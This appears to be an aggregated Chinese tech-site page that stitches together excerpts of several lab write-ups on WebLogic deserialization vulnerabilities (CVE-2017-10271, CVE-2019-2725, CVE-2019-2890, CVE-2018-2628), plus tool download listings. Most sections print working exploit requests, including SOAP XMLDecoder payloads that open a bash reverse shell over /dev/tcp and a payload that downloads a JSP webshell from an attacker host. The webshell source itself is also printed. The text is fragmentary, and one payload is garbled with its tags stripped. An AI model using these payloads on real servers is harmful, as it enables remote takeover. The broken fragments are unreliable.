精华内容
下载资源
问答
  • weblogic反序列化漏洞
    2022-04-21 19:27:11

    漏洞原因

    Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。

    影响版本

    • 10.3.6
    • 12.1.3
    • 12.2.1.1.0
    • 12.2.1.2.

    漏洞复现

    启动vulhub靶场

    看到上面的页面说明启动成功

    先开启监听

    然后发送下面的数据包(反弹语句需要编码):

    POST /wls-wsat/CoordinatorPortType HTTP/1.1
    Host: 192.168.96.168:7001
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Connection: close
    Content-Type: text/xml
    Upgrade-Insecure-Requests: 1
    Content-Length: 639

    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
    <java version="1.4.0" class="java.beans.XMLDecoder">
    <void class="java.lang.ProcessBuilder">
    <array class="java.lang.String" length="3">
    <void index="0">
    <string>/bin/bash</string>
    </void>
    <void index="1">
    <string>-c</string>
    </void>
    <void index="2">
    <string>bash -i &gt;&amp; /dev/tcp/192.168.96.1/1234 0&gt;&amp;1</string>
    </void>
    </array>
    <void method="start"/></void>
    </java>
    </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body/>
    </soapenv:Envelope>

    成功反弹:

    参考链接:

    更多相关内容
  • Weblogic 反序列化漏洞检查工具CVE-2017-10271.zip
  • Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
  • Weblogic反序列化漏洞补丁(FMJJ),这是一个累积补丁,代号FMJJ
  • 2018最新weblogic反序列化漏洞补丁包

    热门讨论 2018-05-22 19:30:11
    在p27395085_1036_Generic补丁的基础上再打上27453773_1036_Gener,解决CVE-2016-0638、CVE-2016-3510、CVE-2017-3248、CVE-2018-2628
  • README.md中有具体使用方法,python脚本测试weblogic反序列化漏洞,测试前需要关闭T3协议
  • 含p20780171_1036_Generic.zip、p22248372_1036012_Generic.zip、测试工具Test.jar
  • weblogic最新漏洞的检测,自己已经测试,可以使用,在使用之前系统要安装python和修改py文件中的ip和weblogic端口
  • 好用的Weblogic XML 反序列化漏洞检查工具 CVE-2017-10271 使用范围Oracle WebLogic Server 10.3.6.0.0版本 Oracle WebLogic Server 12.2.1.1.0版本 Oracle WebLogic Server 12.1.3.0.0版本
  • weblogic 补丁 反序列补丁 。己已经打上补丁了。欢迎下载
  • Weblogic反序列化漏洞经过了几个阶段,利用技术也有多种变形 从利用方式来看,分为三类 1.直接通过T3协议发送恶意反序列化对象(CVE-2015-4582、CVE-2016-0638、CVE-2016-3510、CVE-2020-2555、CVE-2020-2883) 2.利用...

    啥是weblogic

    WebLogic是Oracle发布的一个基于JAVAEE架构的web中间件
    大概可以理解为tomcat pro max🙃

    Weblogic反序列化漏洞的几个利用阶段
    从利用方式来看,分为三类

    1.直接通过T3协议发送恶意反序列化对象(CVE-2015-4582、CVE-2016-0638、CVE-2016-3510、CVE-2020-2555、CVE-2020-2883)
    2.利用T3协议配合RMP或ND接口反向发送反序列化数据(CVE2017-3248、CVE2018-2628、CVE2018-2893、CVE2018-3245、CVE-2018-3191、CVE-2020-14644、CVE-2020-14645)还有利用IIOP协议的CVE-2020-2551
    3.通过 javabean XML方式发送反序列化数据。(CVE2017-3506->CVE-2017-10271->CVE2019-2725->CVE-2019-2729)

    漏洞复现
    由于漏洞众多,搭建环境比较复杂,还是先利用vulhub中的CVE-2017-10271、CVE-2018-2628、CVE-2018-2894、CVE-2020-14882几个标志性的漏洞环境进行复现。

    先从最古老的开始

    CVE-2017-10271

    影响范围:10.3.6.0.0,12.1.3.0.0,12.2.1.1.0,12.2.1.2.0

    docker开启环境

    root@kali:/vulhub/weblogic/CVE-2017-10271# docker-compose up -d
    

    远古版本,环境好大先忍一下

    等待的过程中先理解一下漏洞原理以及vulhub给出的poc

    该漏洞主要针对weblogic的WLS-WebServices组件
    属于上述反序列化漏洞利用的第三类
    大致的原理通过传输javabean XML方式构造恶意XML数据造成代码执行

    结合poc来看

    POST /wls-wsat/CoordinatorPortType HTTP/1.1
    Host: your-ip:7001
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Content-Type: text/xml
    Content-Length: 633
    
    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
        <soapenv:Header>
            <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
                <java version="1.8.0_131" class="java.beans.XMLDecoder">
                    <void class="java.lang.ProcessBuilder">
                        <array class="java.lang.String" length="3">
                            <void index="0">
                                <string>/bin/bash</string>
                            </void>
                            <void index="1">
                                <string>-c</string>
                            </void>
                            <void index="2">
                                <string>bash -i &gt;&amp; /dev/tcp/ip/port 0&gt;&amp;1</string>
                            </void>
                        </array>
                        <void method="start" />
                    </void>
                </java>
            </work:WorkContext>
        </soapenv:Header>
        <soapenv:Body />
    </soapenv:Envelope>
    

    大概是向网站的/wls-wsat/CoordinatorPortType路径传入xml数据,这串xml目的是反弹shell
    在这里插入图片描述
    OK,环境起好开始复现

    访问localhost:7001/wls-wsat/CoordinatorPortType,显示wls-wsat组件的一些配置信息,表示服务已经开启
    在这里插入图片描述
    本地监听6666端口

    root@kali:/# nc -l -p 6666
    

    bp抓包重放构造好的数据包,注意字段Content-Type改为text/xml
    在这里插入图片描述
    成功反弹shell,服务器执行了我们传入的
    /bin/bash -c bash -i >& /dev/tcp/ip/port 0>&1
    在这里插入图片描述

    漏洞原理

    漏洞利用的过程很简单
    有两个疑问点

    1.wls-wsat组件如何处理xml数据
    2.造成反序列化漏洞的关键点在哪

    尝试传入任意命令
    在这里插入图片描述
    在响应中看到了返回的xml数据以及整个处理过程的调用栈
    在这里插入图片描述
    在这里插入图片描述
    可以看到处理过程最后调用了java.beans.XMLDecoder方法,该方法用于将XML数据反序列化为java对象,这里造成了无回显的命令执行

    根据vulhub提供的技术文档、参考大佬的分析过程可以得知大致的处理过程
    在这里插入图片描述

    1.根据POC,当我们传入<soapenv>标签包裹的数据时,wls-wsat使用了weblogic自带的webservices处理程序来处理SOAP请求
    2.该处理程序首先调用weblogic.wsee.jaxws.workcontext.WorkContextServerTube.processRequest方法获取到我们传入的xml数据为var1,定义var2为处理过的var1数据
    3.通过var2.get()方法中的WorkAreaConstants.WORK_AREA_HEADER参数获取<work:WorkContext >标签中的内容
    4.当var3不为空时,执行readHeaderOld(var3);

    在这里插入图片描述

    5.在readHeaderOld中,实例化了WorkContextXmlInputAdapter,此时方法内的var4是java标签里的内容

    在这里插入图片描述

    6.在实例化WorkContextXmlInputAdapter中,直接调用xmlDecoder反序列化传入的xml数据,也就是处理过的var4

    从整个过程中可以发现,传入的xml数据从始至终都没有受到任何过滤,wls-wsat的类似剥洋葱的处理方式一层一层揭开最后直接反序列化,这样显然是很不安全滴。

    展开全文
  • Weblogic反序列化漏洞(CVE-2019-2725)复现

    千次阅读 2021-11-22 14:32:52
    Weblogic反序列化漏洞(CVE-2019-2725)复现 漏洞描述: CVE-2019-2725是一个Oracle weblogic反序列化远程命令执行漏洞,这个漏洞依旧是根据weblogic的xmldecoder反序列化漏洞,通过针对Oracle官网历年来的补丁构造...

    Weblogic反序列化漏洞(CVE-2019-2725)复现

    漏洞描述:

    CVE-2019-2725是一个Oracle weblogic反序列化远程命令执行漏洞,这个漏洞依旧是根据weblogic的xmldecoder反序列化漏洞,通过针对Oracle官网历年来的补丁构造payload来绕过。

    影响范围:

    weblogic 10.x

    weblogic 12.1.3

    漏洞复现:

    环境介绍:

            攻击机:Windows7

       靶机:Windows7(apache tomcat8.5.39)

       内网服务器:Linux(Oracle weblogic10.3.6)

    复现过程:

            首先搭建apache tomcat作为已经被黑客入侵并且存在webshell的网站:

    然后上传大马:

     

    然后开始搭建weblogic,这里我是用的Linux系统,搭建成功后访问:

     

    漏洞存在于:_async/AsyncResponseService,访问地址可以访问则存在漏洞: 

    可以访问,即存在漏洞,使用burp抓包然后构造payload发送到服务器,使服务器执行命令,下载apache tomcat网站的大马:

     

    POC如下:

    POST /_async/AsyncResponseService HTTP/1.1
    Host: IP:PORT
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
    Connection: close
    Content-Length: 859
    Accept-Encoding: gzip, deflate
    SOAPAction:
    Accept: */*
    User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
    Connection: keep-alive
    content-type: text/xml
    
    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing"
    xmlns:asy="http://www.bea.com/async/AsyncResponseService">
    <soapenv:Header>
    <wsa:Action>xx</wsa:Action>
    <wsa:RelatesTo>xx</wsa:RelatesTo>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
    <void class="java.lang.ProcessBuilder">
    <array class="java.lang.String" length="3">
    <void index="0">
    <string>/bin/bash</string>
    </void>
    <void index="1">
    <string>-c</string>
    </void>
    <void index="2">
    <string>wget http://HackerIP:8080/JspSpy.jsp.txt -O servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/2.jsp</string>
    </void>
    </array>
    <void method="start"/></void>
    </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body>
    <asy:onAsyncDelivery/>
    </soapenv:Body></soapenv:Envelope>

    可以看到返回值:202,命令执行成功,访问:

     

    木马成功上传,也可以查看服务器:

     

    注明: 一般遇到,拿工具之间破解,工具网上很多,这里就不展示了。

    漏洞修复:

            升级本地JDK环境

            及时安装官方补丁

    展开全文
  • WebLogic 反序列化漏洞(CVE-2019-2890)

    千次阅读 2022-02-09 10:11:03
    漏洞绕过了Weblogic的反序列黑名单,使攻击者可以通过T3协议对存在漏洞Weblogic组件实施远程攻击。由于T3协议在Weblogic控制台开启的情况下默认开启,而Weblogic默认安装会自动开启控制台,所以攻击者

    一.漏洞介绍

    2019年10月15日,Oracle官方发布了2019年10月安全更新公告,其中包含了一个可造成RCE远程任意代码执行的高危漏洞,漏洞编号为CVE-2019-2890。

       Weblogic在利用T3协议进行远程资源加载调用时,默认会进行黑名单过滤以保证反序列化安全。本漏洞绕过了Weblogic的反序列化黑名单,使攻击者可以通过T3协议对存在漏洞的Weblogic组件实施远程攻击。由于T3协议在Weblogic控制台开启的情况下默认开启,而Weblogic默认安装会自动开启控制台,所以攻击者可通过此漏洞造成远程代码执行,以控制Weblogic服务器。
    

    二.影响版本

    WebLogic Server 10.3.6.0
    WebLogic Server 12.1.3.0
    WebLogic Server 12.2.1.3
    

    三.环境搭建

    测试环境版本:WebLogic Server 10.3.6.0
    直接利用vulhub的漏洞,进入相应目录
    下载环境:docker-compose up -d
    在这里插入图片描述
    访问http://ip:7001/console/login/LoginForm.jsp
    搭建成功
    在这里插入图片描述

    四.漏洞复现

    判断是否存在漏洞,如图所示
    http://ip:7001/_async/AsyncResponseService在这里插入图片描述在当前文件所在目录用python开启web服务,命令:python3 -m http.server 11111

    在这里插入图片描述shell.txt内容
    <%
    if(“123”.equals(request.getParameter(“pwd”))){
    java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter(“cmd”)).getInputStream();
    int a = -1;
    byte[] b = new byte[1024];
    out.print("

    ");
    while((a=in.read(b))!=-1){
    out.println(new String(b));
    }
    out.print("
    ");
    }
    %>

    1.访问web服务
    在这里插入图片描述2.访问http://ip:7001/_async/AsyncResponseService
    截取数据包 以下内容替换数据包

    POST /_async/AsyncResponseService HTTP/1.1
    Host: you ip:7001
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
    Connection: close
    Content-Length: 858
    content-type: text/xml
    <soapenv:Envelope
    xmlns:soapenv=“http://schemas.xmlsoap.org/soap/envelope/” xmlns:wsa=“http://www.w3.org/2005/08/addressing” xmlns:asy=“http://www.bea.com/async/AsyncResponseService”>
    soapenv:Header
    wsa:Actionxx</wsa:Action>
    wsa:RelatesToxx</wsa:RelatesTo>
    <work:WorkContext xmlns:work=“http://bea.com/2004/06/soap/workarea/”>



    /bin/bash


    -c


    wget http://web服务ip:端口/shell.txt -O servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/shell.jsp



    </work:WorkContext>
    </soapenv:Header>
    soapenv:Body
    asy:onAsyncDelivery/
    </soapenv:Body></soapenv:Envelope>

    返回结果
    在这里插入图片描述
    访问shell
    http://ip:7001/_async/shell.jsp?pwd=123&cmd=whoami

    http://ip:7001/_async/shell.jsp?pwd=123&cmd=cat/etc/passwd
    在这里插入图片描述

    五.漏洞修复

    1.更新Oracle 2019年10月补丁

      https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html
    

    2.控制T3协议的访问

      此漏洞产生于WebLogic的T3服务,因此可通过控制T3协议的访问来临时阻断针对该漏洞的攻击。当开放WebLogic控制台端口(默认为7001端口)时,T3 服务会默认开启。具体操作:
    

    (1)进入WebLogic控制台,在base_domain的配置页面中,进入“安全”选项卡页面,点击“筛选器”,进入连接筛选器配置。

    (2)在连接筛选器中输入:weblogic.security.net.ConnectionFilterImpl,在连接筛选器规则中输入:127.0.0.1 * * allow t3 t3s,0.0.0.0/0 * * deny t3 t3s(t3和t3s协议的所有端口只允许本地访问)。

    (3)保存后需重新启动,规则方可生效。

    展开全文
  • 漏洞验证 1.http://ip:端口/wls-wsat/CoordinatorPortType 2.http://ip:端口/_async/AsyncResponseServiceSoap12 如果页面能访问到,证明存在漏洞漏洞修复 解决方法:删除不安全文件 针对漏洞1,如下删除命令:...
  • 文章目录漏洞名称漏洞编号漏洞描述影响...weblogic反序列远程命令执行漏洞 漏洞编号 CVE-2019-2725 漏洞描述 CVE-2019-2725是一个Oracle weblogic反序列远程命令执行漏洞, 这个漏洞依旧是根据weblogic的xm
  • Weblogic的功能以及相关历史漏洞Weblogic的反序列漏洞复现 Weblogic的反序列的分析 Weblogic的反序列化漏洞的思考
  • WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态...
  • WebLogic反弹需要等5秒左右 2. 该工具为对外测试版,请尽量按照正常思路来用,比如Url填写清楚,IP地址写对了,报错或者抛异常神马的别怪我,调输入校验好蛋疼。 本工具与网上已公布工具优点: 1. 综合实现网上公布...
  • Weblogic远程代码执行漏洞CVE- 2018-3245加固 1、漏洞描述 ①WebLogic Server中的RMI通信使用T3协议在WebLogic Server和其他Java程序(包括客户端...②WebLogic java反序列化漏洞( CVE-2018-3245 )是通过JRMP协议利用RM
  • WebLogic 反序列化漏洞(CVE-2019-2890)一、漏洞描述2019年10月15日,Oracle官方发布了2019年10月安全更新公告,其中包含了一个可造成RCE远程任意代码执行的高危漏洞漏洞编号为CVE-2019-2890。Weblogic在利用T3协议...
  • weblogic CVE-2018-2628 反序列化漏洞 ,包含安装手册以及补丁文件
  • Weblogic反序列在各大论坛的讨论一直是轰轰烈烈的,引发本漏洞其实并不能怪java的反序列机制. 测试漏洞存在,应朋友的要求帮忙做个补救,翻遍网上大牛们的技术贴,有两种临时补救的方法,但是尝试过之后对应用有...
  • 接着上篇,这次复现经典的weblogic反序列化漏洞—CVE-2018-2628 属于利用T3协议配合RMP接口反向发送反序列化数据。 同样先利用vulhub快速复现,然后再来看看原理。 漏洞复现 CVE-2018-2628 影响范围:10.3.6.0、12.1...
  • 目录 一. 漏洞介绍 二.... 三. 漏洞环境搭建 ... 2019年10月15日,Oracle官方发布了2019年10月安全更新公告,其中包含了一个可造成RCE远程任意代码执行的高危漏洞漏洞编号为CVE-2019-2890。 Weblogi...
  • Weblogic反序列化漏洞(cve-2018-2628 )

    千次阅读 2022-03-02 11:14:10
    Weblogic反序列化漏洞(cve-2018-2628 ) 环境搭建 靶机:CentOS7(192.168.2.110:7001) 监听机器:Win10:(192.168.2.105:6666) 将环境vulhub的环境git到本地 git clone https://github.com/vulhub/vulhub.git ...
  • Weblogic反序列化漏洞补丁包。1.0.36需要先升级到P12.
  • 声明:请勿用作违法用途,否则后果自负0x01 简介用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。0x02 漏洞概述漏
  • weblogic反序列 编号 CVE-2017-10271 影响版本 10.3.6.0.0 /12.1.3.0.0/12.2.1.1.0/12.2.1.2.0 2环境搭建 在vulhub漏洞环境中: locate CVE-2017-10271 #找到CVE-2017-10271所在路径 在路径中启动靶机...
  • Weblogic反序列化漏洞(CVE-2018-2628环境搭建工具准备漏洞复现 环境搭建 使用vulhub进行环境搭建,具体的步骤可以自行百度 工具准备 下载ysoserial,为了启动JRMP Server EXP地址:...
  • WebLogic反序列化漏洞(CVE_2021_2394)

    千次阅读 2021-09-12 18:41:32
    本次利用vulhub靶场的/weblogic/CVE-2020-14882靶机复现 攻击机环境与工具:jdk1.8,JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar,CVE_2021_2394.jar http://dnslog.cn/ 在dnslog.cn点击get subdomain,得到url ...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 1,525
精华内容 610
关键字:

weblogic反序列化漏洞

友情链接: PSpiceLibraryguideOrCAD.zip